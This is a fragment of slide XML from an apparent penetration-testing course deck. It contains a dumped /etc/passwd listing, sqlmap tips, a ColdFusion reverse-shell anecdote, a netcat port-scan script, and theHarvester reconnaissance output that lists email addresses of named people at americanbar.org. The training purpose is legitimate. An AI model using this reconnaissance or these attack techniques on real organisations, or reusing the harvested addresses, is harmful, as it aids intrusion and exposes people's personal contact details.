            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> backup:x:34:34:backup:/var/backups:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> list:x:38:38:Mailing List Manager:/var/list:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> irc:x:39:39:ircd:/var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ircd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> nobody:x:65534:65534:nobody:/nonexistent:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> libuuid:x:100:101::/var/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libuuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:106::/var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false usbmux:x:103:46:usbmux daemon,,,:/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usbmux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false avahi-autoipd:x:105:113:Avahi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>autoip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> daemon,,,:/var/lib/avahi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>autoipd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false saned:x:108:115::/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>saned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false whoopsie:x:109:116::/nonexistent:/bin/false speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> avahi:x:111:117:Avahi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> daemon,,,:/var/run/avahi-daemon:/bin/false lightdm:x:112:118:Light Display Manager:/var/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lightdm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false colord:x:113:121:colord </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>colour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> management daemon,,,:/var/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>colord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false hplip:x:114:7:HPLIP system user,,,:/var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hplip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false samurai:x:1000:1000:samurai,,,:/home/samurai:/bin/bash mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false sshd:x:117:65534::/var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nologin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kdm:x:118:65534::/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kdm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:/bin/false</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22890683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501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3167590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way to get parameters to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> correct </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reduces typo errors within URL and form parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CTRL+Shift+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> copies selected data in a terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CTRL+Shift+V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pastes data into a terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="670914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with a Cold Fusion vulnerability. The admin panel for cold fusion had a scheduled task. Once the task failed it would perform an action. As you couldn’t upload files, I tried to load a file into memory using SMB. Made it easy to upload a reverse shell to the server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1854184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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1795099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_   _                                            _             *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* | __|  _ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*                                                                 *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 3.1.0                                         *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* Coded by Christian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Martorella</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                   *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* Edge-Security Research                                          *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmartorella@edge-security.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                   *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*                                                                 *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>******************************************************************* </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Target: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching Baidu. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching Bing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CertSpotter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DNSdumpster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching Dogpile. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching DuckDuckGo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching Google. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 0 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 100 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 200 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 300 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 400 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 500 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching Hunter. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Linkedin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 100 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 200 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 300 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 400 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 500 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] No users found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Linkedin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netcraft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Threatcrowd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching Trello. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching 0 results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching Twitter usernames using Google. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] No users found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Searching results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Searching Yahoo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] No IPs found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Emails found: 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>----------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>abairr@americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>abalegalfactcheck@americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>abapresident@americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>info@nativeamericanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>info@philippineamericanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>patrice.payne@americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tanya.terrell@americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Hosts found: 113</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>---------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] No Trello URLs found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Reporting started.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Reporting finished.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Saving files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Files saved.</a:t>
            </a:r>
          </a:p>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399651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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2622991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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188459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combined with a simple bash for loop to check multiple IP addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55227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can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the script to make it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>executeable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc_portscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc_portscan</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1DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
